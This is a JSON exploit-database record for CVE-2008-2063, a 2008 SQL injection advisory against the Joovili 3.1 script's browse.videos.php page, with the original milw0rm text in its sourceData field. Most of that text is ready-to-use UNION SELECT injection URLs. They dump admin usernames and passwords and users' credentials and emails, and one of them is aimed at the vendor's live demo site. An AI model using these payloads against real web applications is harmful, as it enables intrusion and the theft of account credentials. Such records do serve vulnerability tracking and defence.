{"id": "EDB-ID:5520", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joovili 3.1 - 'browse.videos.php' SQL Injection", "description": "", "published": "2008-04-28T00:00:00", "modified": "2008-04-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/5520", "reporter": "HaCkeR_EgY", "references": [], "cvelist": ["2008-2063"], "immutableFields": [], "lastseen": "2022-08-16T09:32:45", "viewCount": 15, "enchantments": {"dependencies": {}, "score": {"value": 0.7, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "_state": {"dependencies": 1661182887, "score": 1661184847}, "_internal": {"score_hash": "2a6230abeaa8e1f14f10bce46cad9d50"}, "sourceHref": "https://www.exploit-db.com/download/5520", "sourceData": "#####################################################\r\n# [-Joovili-] \t\t #\r\n# Rem0te SQL Injection Vulnerability \t #\r\n# IN ==> browse.videos.php <==== \t #\r\n#####################################################\r\n \r\n[<>]Author: HaCkeR-EgY\r\n \r\n[<>]H^0mE: WWW.PAL-HACKER.COM , ATSDP.COM\r\n \r\n[<>]CONTact: hacker_EGY@hotmail.com\r\n================================================\r\n[<>]Script : Joovili\r\n[<>]version : Version 3.1.0\r\n[<>]price :$155 USD\r\n[<>]DOWNL0AD : www.joovili.com\r\n================================================\r\n[<>] D0RK : use your Mind (:\r\n \r\n[<>] Explo!t :\r\n\r\n[<>] 1 ====>http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,user(),7,8,9/**/from/**/joovili_admins/*\r\n\r\n[<>] 2 =====>http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,id,username,password,email),5,user(),7,8,9/**/from/**/joovili_users/*\r\n\r\n[<>] L!Ve DeM0 :\r\n \r\n====> http://demo.joovili.com/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,6,7,8,9/**/from/**/joovili_admins/*\r\n \r\n\r\n[<>]N0te :::>> 1- Sometime Requires to register\r\n &n bsp; 2- You can Find other Errors\r\n=======================================================\r\n[<>] Thanx : MY Brotha and MY Master \" Abo Mohamed \"\r\n[<>] Greetz : F!resell , Mohamed el Arab , MrExE , H-T Team [ HouSSaMix +\r\nToXiC350 ] , Gold_M , V4 Team , Jiki Team , RoMaNcYxHaCkEr , stR0ke\r\n\r\n# milw0rm.com [2008-04-28]", "osvdbidlist": ["44670"], "exploitType": "webapps", "verified": true}
{}